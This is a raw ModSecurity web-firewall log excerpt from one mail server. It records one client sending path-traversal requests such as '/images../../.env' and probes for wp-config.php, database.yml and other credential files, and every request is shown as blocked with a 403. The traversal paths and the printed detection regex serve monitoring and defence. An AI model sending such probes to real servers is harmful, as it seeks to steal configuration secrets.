"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe-wgpmE1yW0glLdguzwAAANE"]
[Tue May 12 05:31:07.534319 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe-wgpmE1yW0glLdguzwAAANE"]
[Tue May 12 05:31:07.534483 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe-wgpmE1yW0glLdguzwAAANE"]
[Tue May 12 05:31:08.320795 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe-wgpmE1yW0glLdguzwAAANE"]
[Tue May 12 05:31:08.359935 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe_AgpmE1yW0glLdgu0AAAANE"]
[Tue May 12 05:31:08.360151 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe_AgpmE1yW0glLdgu0AAAANE"]
[Tue May 12 05:31:09.149476 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe_AgpmE1yW0glLdgu0AAAANE"]
[Tue May 12 05:31:09.187760 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe_QgpmE1yW0glLdgu0QAAANE"]
[Tue May 12 05:31:09.187989 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe_QgpmE1yW0glLdgu0QAAANE"]
[Tue May 12 05:31:09.969217 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe_QgpmE1yW0glLdgu0QAAANE"]
[Tue May 12 05:31:10.007630 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe_ggpmE1yW0glLdgu0gAAANE"]
[Tue May 12 05:31:10.007841 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe_ggpmE1yW0glLdgu0gAAANE"]
[Tue May 12 05:31:10.787859 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe_ggpmE1yW0glLdgu0gAAANE"]
[Tue May 12 05:31:10.826639 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe_ggpmE1yW0glLdgu0wAAANE"]
[Tue May 12 05:31:10.826714 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe_ggpmE1yW0glLdgu0wAAANE"]
[Tue May 12 05:31:10.826876 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe_ggpmE1yW0glLdgu0wAAANE"]
[Tue May 12 05:31:11.629066 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe_ggpmE1yW0glLdgu0wAAANE"]
[Tue May 12 05:31:11.666704 2026] [core:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] AH10244: invalid URI path (/images../../../.env)
[Tue May 12 05:31:13.225616 2026] [core:error] [pid 1820198:tid 1820212] [client 45.148.10.247:63172] AH10244: invalid URI path (/images../../../../.env)
[Tue May 12 05:31:14.235249 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfAtr1yOh9TvizezigUgAAAE8"]
[Tue May 12 05:31:14.235340 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfAtr1yOh9TvizezigUgAAAE8"]
[Tue May 12 05:31:14.235509 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfAtr1yOh9TvizezigUgAAAE8"]
[Tue May 12 05:31:15.050252 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfAtr1yOh9TvizezigUgAAAE8"]
[Tue May 12 05:31:15.094183 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfA9r1yOh9TvizezigUwAAAE8"]
[Tue May 12 05:31:15.094255 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfA9r1yOh9TvizezigUwAAAE8"]
[Tue May 12 05:31:15.094424 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfA9r1yOh9TvizezigUwAAAE8"]
[Tue May 12 05:31:15.903386 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfA9r1yOh9TvizezigUwAAAE8"]
[Tue May 12 05:31:15.947155 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfA9r1yOh9TvizezigVAAAAE8"]
[Tue May 12 05:31:15.947224 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfA9r1yOh9TvizezigVAAAAE8"]
[Tue May 12 05:31:15.947391 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfA9r1yOh9TvizezigVAAAAE8"]
[Tue May 12 05:31:16.729268 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfA9r1yOh9TvizezigVAAAAE8"]
[Tue May 12 05:31:16.773379 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKfBNr1yOh9TvizezigVQAAAE8"]
[Tue May 12 05:31:16.773582 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKfBNr1yOh9TvizezigVQAAAE8"]
[Tue May 12 05:31:17.564248 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfBNr1yOh9TvizezigVQAAAE8"]
[Tue May 12 05:31:17.608342 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKfBdr1yOh9TvizezigVwAAAE8"]
[Tue May 12 05:31:17.608549 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKfBdr1yOh9TvizezigVwAAAE8"]
